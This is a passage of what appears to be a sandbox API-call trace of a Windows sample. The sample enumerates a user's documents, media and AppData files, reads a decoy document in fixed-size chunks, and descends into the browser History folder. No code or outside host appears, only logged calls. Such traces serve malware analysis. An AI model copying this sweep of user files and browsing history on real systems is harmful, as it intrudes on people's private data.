lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/jbjbayjalmaqe.jpg") returned 121 [0085.835] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.835] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/pjm8g%20hD0vDM.docx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/pjm8g%20hd0vdm.docx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/pjm8g%20hd0vdm.docx" [0085.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/pjm8g%20hd0vdm.docx") returned 65 [0085.835] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.835] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/saeiBJK2.odp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/saeibjk2.odp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/saeibjk2.odp" [0085.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/saeibjk2.odp") returned 96 [0085.835] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.835] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/MSEz/UwEfM1NA-DSDIRW%20V7.bmp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/uwefm1na-dsdirw%20v7.bmp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/uwefm1na-dsdirw%20v7.bmp" [0085.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/uwefm1na-dsdirw%20v7.bmp") returned 133 [0085.835] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.835] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/cVM_.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/cvm_.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/cvm_.jpg" [0085.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/cvm_.jpg") returned 79 [0085.835] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.835] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/NNKxQYu2C.bmp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/nnkxqyu2c.bmp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/nnkxqyu2c.bmp" [0085.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/nnkxqyu2c.bmp") returned 74 [0085.835] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.835] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/yZVSRi7WB0.pdf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/yzvsri7wb0.pdf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/yzvsri7wb0.pdf" [0085.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/yzvsri7wb0.pdf") returned 98 [0085.835] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.835] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/NCgtsU2wGQ6.bmp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/ncgtsu2wgq6.bmp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/ncgtsu2wgq6.bmp" [0085.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/ncgtsu2wgq6.bmp") returned 67 [0085.836] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.836] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/E1-SZDw/Ym9TcVsa3hY3_SCH.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ym9tcvsa3hy3_sch.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ym9tcvsa3hy3_sch.swf" [0085.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ym9tcvsa3hy3_sch.swf") returned 71 [0085.836] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.836] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/E1-SZDw/IVPBf2a6ZWG8Th8g0v.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ivpbf2a6zwg8th8g0v.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ivpbf2a6zwg8th8g0v.swf" [0085.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ivpbf2a6zwg8th8g0v.swf") returned 73 [0085.836] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.836] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/Hsii3%20s6Wx.ots" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/hsii3%20s6wx.ots") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/hsii3%20s6wx.ots" [0085.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/hsii3%20s6wx.ots") returned 68 [0085.836] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.836] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/pVp12cuh1.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/pvp12cuh1.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/pvp12cuh1.mkv" [0085.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/pvp12cuh1.mkv") returned 65 [0085.836] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.836] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/GGxj998_.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ggxj998_.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ggxj998_.flv" [0085.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ggxj998_.flv") returned 55 [0085.836] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.836] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/CRxV%20J7WKoOCqRc.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/crxv%20j7wkoocqrc.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/crxv%20j7wkoocqrc.flv" [0085.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/crxv%20j7wkoocqrc.flv") returned 64 [0085.836] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.836] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/gM13IfQVW%20O2Ca5SQCfU.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/gm13ifqvw%20o2ca5sqcfu.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/gm13ifqvw%20o2ca5sqcfu.gif" [0085.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/gm13ifqvw%20o2ca5sqcfu.gif") returned 78 [0085.836] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.837] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/X-baj.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/x-baj.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/x-baj.mkv" [0085.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/x-baj.mkv") returned 61 [0085.837] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.837] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/Y0vXIkBYowmim.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/y0vxikbyowmim.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/y0vxikbyowmim.gif" [0085.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/y0vxikbyowmim.gif") returned 61 [0085.837] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.837] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/lxcFr82x4aQ4USWN.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/lxcfr82x4aq4uswn.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/lxcfr82x4aq4uswn.mkv" [0085.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/lxcfr82x4aq4uswn.mkv") returned 72 [0085.837] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.837] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/txCExlFtYlQ2O.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/txcexlftylq2o.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/txcexlftylq2o.gif" [0085.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/txcexlftylq2o.gif") returned 69 [0085.837] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.837] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/Kdgk.docx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/kdgk.docx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/kdgk.docx" [0085.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/kdgk.docx") returned 55 [0085.837] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.837] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/E1-SZDw/cS-naYuN66m1kJ0QH.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cs-nayun66m1kj0qh.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cs-nayun66m1kj0qh.flv" [0085.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cs-nayun66m1kj0qh.flv") returned 72 [0085.837] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.837] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/4q6aKWEGF.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4q6akwegf.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4q6akwegf.mkv" [0085.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4q6akwegf.mkv") returned 56 [0085.838] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.838] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/O%201buNaGZfIK.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/o%201bunagzfik.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/o%201bunagzfik.flv" [0085.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/o%201bunagzfik.flv") returned 61 [0085.838] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.838] _strlwr (in: _Str="file:///C:/Users/BGC6U8~1/Desktop/sample_file.doc" | out: _Str="file:///c:/users/bgc6u8~1/desktop/sample_file.doc") returned="file:///c:/users/bgc6u8~1/desktop/sample_file.doc" [0085.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8~1/desktop/sample_file.doc") returned 50 [0085.838] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.838] SetFilePointer (in: hFile=0xa0, lDistanceToMove=62464, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf400 [0085.838] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.838] SetFilePointer (in: hFile=0xa0, lDistanceToMove=62592, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf480 [0085.838] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.838] SetFilePointer (in: hFile=0xa0, lDistanceToMove=62720, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf500 [0085.838] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.838] SetFilePointer (in: hFile=0xa0, lDistanceToMove=62848, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf580 [0085.838] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.838] SetFilePointer (in: hFile=0xa0, lDistanceToMove=62976, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf600 [0085.838] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.838] SetFilePointer (in: hFile=0xa0, lDistanceToMove=63104, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf680 [0085.838] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.838] SetFilePointer (in: hFile=0xa0, lDistanceToMove=63232, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf700 [0085.838] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.838] SetFilePointer (in: hFile=0xa0, lDistanceToMove=63360, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf780 [0085.839] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.839] SetFilePointer (in: hFile=0xa0, lDistanceToMove=63488, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf800 [0085.839] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.839] SetFilePointer (in: hFile=0xa0, lDistanceToMove=63616, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf880 [0085.839] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.839] SetFilePointer (in: hFile=0xa0, lDistanceToMove=63744, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf900 [0085.839] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.839] SetFilePointer (in: hFile=0xa0, lDistanceToMove=63872, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf980 [0085.839] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.839] SetFilePointer (in: hFile=0xa0, lDistanceToMove=64000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfa00 [0085.839] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.839] SetFilePointer (in: hFile=0xa0, lDistanceToMove=64128, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfa80 [0085.839] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.839] SetFilePointer (in: hFile=0xa0, lDistanceToMove=64256, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfb00 [0085.839] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.839] SetFilePointer (in: hFile=0xa0, lDistanceToMove=64384, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfb80 [0085.839] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.839] SetFilePointer (in: hFile=0xa0, lDistanceToMove=64512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfc00 [0085.839] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.840] SetFilePointer (in: hFile=0xa0, lDistanceToMove=64640, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfc80 [0085.840] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.840] SetFilePointer (in: hFile=0xa0, lDistanceToMove=64768, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfd00 [0085.840] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.840] SetFilePointer (in: hFile=0xa0, lDistanceToMove=64896, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfd80 [0085.840] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.840] SetFilePointer (in: hFile=0xa0, lDistanceToMove=65024, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfe00 [0085.840] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.840] SetFilePointer (in: hFile=0xa0, lDistanceToMove=65152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfe80 [0085.840] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.840] SetFilePointer (in: hFile=0xa0, lDistanceToMove=65280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xff00 [0085.840] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.840] SetFilePointer (in: hFile=0xa0, lDistanceToMove=65408, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xff80 [0085.840] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.840] CloseHandle (hObject=0xa0) returned 1 [0085.840] FindNextFileW (in: hFindFile=0x58e8e8, lpFindFileData=0x288bac | out: lpFindFileData=0x288bac) returned 0 [0085.840] FindClose (in: hFindFile=0x58e8e8 | out: hFindFile=0x58e8e8) returned 1 [0085.840] FindNextFileW (in: hFindFile=0x58e8a8, lpFindFileData=0x2895a8 | out: lpFindFileData=0x2895a8) returned 0 [0085.840] FindClose (in: hFindFile=0x58e8a8 | out: hFindFile=0x58e8a8) returned 1 [0085.840] FindNextFileW (in: hFindFile=0x58e868, lpFindFileData=0x289fa4 | out: lpFindFileData=0x289fa4) returned 1 [0085.841] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x40 [0085.841] wcslen (_String="Low") returned 0x3 [0085.841] wcscpy (in: _Dest=0x28a1f4, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History" [0085.841] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x40 [0085.841] wcscat (in: _Dest=0x28a1f4, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\" [0085.841] wcscat (in: _Dest=0x28a1f4, _Source="Low" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low" [0085.841] wcscmp (_String1="Low", _String2="..") returned 1 [0085.841] wcscmp (_String1="Low", _String2=".") returned 1 [0085.841] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned 0x44 [0085.841] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned 0x44 [0085.841] wcslen (_String="*.*") returned 0x3 [0085.841] wcscpy (in: _Dest=0x289320, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low" [0085.841] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned 0x44 [0085.841] wcscat (in: _Dest=0x289320, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\" [0085.841] wcscat (in: _Dest=0x289320, _Source="*.*" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\*.*") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\*.*" [0085.841] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\*.*", lpFindFileData=0x2895a8 | out: lpFindFileData=0x2895a8) returned 0x58e8a8 [0085.841] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned 0x44 [0085.841] wcslen (_String=".") returned 0x1 [0085.841] wcscpy (in: _Dest=0x2897f8, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\Low") returned="C:\\Users\\BGC6u8Oy 